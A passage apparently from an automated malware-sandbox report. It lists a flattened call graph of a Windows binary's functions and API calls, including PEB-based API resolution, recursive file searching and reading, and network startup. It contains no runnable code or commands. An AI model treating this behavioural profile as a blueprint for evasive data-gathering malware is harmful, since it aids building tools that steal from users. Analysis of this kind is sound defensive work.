40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 